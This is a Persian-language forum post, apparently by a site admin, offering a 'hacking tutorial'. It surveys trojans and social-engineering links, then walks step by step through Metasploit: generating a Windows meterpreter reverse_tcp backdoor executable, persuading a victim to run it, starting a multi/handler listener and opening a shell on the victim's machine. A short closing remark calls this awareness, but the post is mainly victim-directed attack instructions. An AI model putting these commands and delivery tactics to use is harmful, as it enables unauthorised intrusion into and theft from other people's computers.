صفحه اصلی | انجمن | ورود | عضویت | خوراک | نقشه | تماس با ما | چت | آپلود فایل | فتوشاپ آنلاین تبلیغات
اموزش هک
::: در حال بارگیری لطفا صبر کنید :::

نام کاربري : پسورد : يا عضويت | رمز عبور را فراموش کردم


تعداد بازدید : 257
نویسنده پیام
admin
آفلاین



ارسال‌ها: 284
عضویت: 28 /6 /1392
تشکر کرده: 34
تشکر شده: 10
اموزش هک
هک کامپیوتر چگونه انجام می شود؟
اگر با واژه هک و هکر آشنایی چندانی ندارید، قبل از هر چیز پیشنهاد ما به شما مطالعه مطالب پیشین ما در رابطه با انواع هک و هکر می باشد. پس از شناخت انواع هکرها و شناسایی اهداف آن ها برای هک، نوبت به شناسایی روش های هک و نفوذ به سیستم های کامپیوتری می باشد. در شیوه های هک کامپیوتر معمولا پر کاربردترین آن ها دسترسی به کامپیوتر و اطلاعات فرد قربانی از طریق شبکه یا اینترنت می باشد. در این شویه هکر با استفاده از یک برنامه یا لینک های آلوده، اقدام به هک کامپیوتر فرد می نماید. انواع روش های هک کامپیوتر در ادامه ذکر شده است.
هک با استفاده از تروجان ها
یکی از پرکاربردترین و محبوب ترین برنامه های هک برای هکرها، استفاده از تروجان ها می باشد. تروجان ها بسیار ساده ساخته می شوند و معمولا در قالب برنامه های کاربردی و سرگرم کننده فعالیت های مخرب خود را پنهان می کنند. به همین جهت معمولا شناسایی و کشف آن ها بسیار سخت می باشد. تروجان ها معمولا برنامه های به ظاهر ساده ای هستند که توسط برنامه نویسان حرفه ای نوشته شده اند. این برنامه ها پس از نصب در سیستم قربانی، اقدام به هک کامپیوتر وی نموده و سپس اطلاعات قربانی را سرقت خواهد نمود.
هک با استفاده از لینک های آلوده
یکی دیگر از روش های هک کامپیوتر و نفوذ به سیستم های رایانه ای، ترغیب کاربر قربانی به کلیک روی لینک های آلوده می باشد. در این روش، هکر با استفاده از روش هایی که به مهندسی اجتماعی مشهور است، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند. به عنوان مثال هکر با وعده هایی نظیر نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی، برای کاربر به نوعی دام پهن می نماید و از آن طریق کاربر را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات کاربر خواهد نمود.
هک با استفاده از IP و بطور مستقیم
می توان گفت که سخت ترین روش هک که به سادگی انجام پذیر نمی باشد، روش هک از طریق مستقیم و بدون نیاز به برنامه ای خاص می باشد. در این روش هکر که از دانش برنامه نویسی و علوم کامپیوتر بالایی بهره مند است، با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، اقدام به اتصال به سیستم قربانی در شبکه نموده و آنگاه اقدام به هک کامپیوتر وی می نماید. هکر با استفاده از دانشی که دارد، می داند که سیستم قربانی از چه نواحی آسیب پذیر بوده و با استفاده از ابزار های خود لینوکس اقدام به کشف آن آسیب پذیری ها و سپس نفوذ به کامپیوتر مربوطه می نماید.
آموزش هک کامپیوتر با استفاده از کالی لینوکس
برای هک کامپیوتر از طریق کالی لینوکس یک روش ساده وجود دارد که در این بخش به شما آن روش را نشان خواهیم داد تا بدانید که هکرها به چه سادگی می توانند سیستم شما هک نمایند.
در قدم اول هکر سیستم کالی لینوکس خود را باز می کند و به محیط ترمینال لینوکس می رود. دستور msfconsole را وارد کرده و تا وارد محیط متااسپلوییت گردد.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/1-5.png
وارد کردن دستور msfconsol
در قدم دوم با استفاده از دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را قرار دهید. با این دستور خواهید توانست یک در پشتی (Backdoor) در سیستم عامل کالی لینوکس خود بسازید.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/2-1.png
به جای آدرس آیپی، آیپی خود را قرار دهید
حال کافیست که قربانی را ترغیب به کلیک روی فایلی که شما ساخته اید کنید. یعنی به نحوی فایل ایجاد شده را برای قربانی بفرستید و او را ترغیب کنید تا آن را باز کند.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/3.png
برنامه در پشتی ساخته شده در لینوکس را برای قربانی بفرستید
در همان خط فرمانی که بودید دستور use exploit/multi/handler را وارد کنید. سپس در خط جدید دستور set payload windows/meterpreter/reverse_tcp را وارد کنید. حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار دهید. پس پایان این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler آغاز به کار نماید.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/4.png
هنگامی که قربانی برنامه ای که ما ساخته ایم را اجرا نماید در محیط متااسپلوییت یک هشدار با موضوع این که یک نشست جدید در برنامه ایجاد شده است ظاهر می گردد. برای ایجاد ارتباط با این نشست، کافی است دستور sessions -i 1 را وارد کنید.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/5.png
حال می بینید که اولین نشست شما با سیستم قربانی برقرار خواهد شد و پس از این قادر خواهید بود که به تمام اطلاعات سیستم قربانی دسترسی داشته باشید. برای این کار تنها کافیست دستور Shell را در خط فرمان تایپ کنید تا به کلیه مسیر ها و پوشه های سیستم قربانی دسترسی پیدا کرده و به نوعی اقدام به هک کامپیوتر وی نمایید.
تصویر: https://superfamilyprotector.com/blog/wp-content/uploads/2017/07/6.png
نتیجه گیری
همانطور که شاهد بودید با استفاده از چند ابزار ساده و صرف زمانی بسیار اندک، توانستیم یک سیستم کامپیوتری را هک کرده و به اطلاعات آن دسترسی داشته باشیم. پس این مقوله نباید به سادگی از کنارش بگذرید. هک کامپیوتر بسیار گسترده می باشد و برنامه ها و ابزار فراوانی برای این اقدام وجود دارد. در وهله اول باید بدانیم برای هک نشدن ابتدا خود ما باید رعایت کنیم. یعنی از ابزارها و برنامه هایی استفاده کنیم که مانعی برای هک شدن باشند.

خدايا ، من در كلبه فقيرانه خود چيزی را دارم كه تو در عرش كبريايي خود نداري ،من چون تویی دارم و تو چون خود نداری

همیشه امیـــد داشته باش
پنجشنبه 30 فروردین 1397 - 02:16
وب کاربر ارسال پیام نقل قول تشکر گزارش



تازه سازي پاسخ ها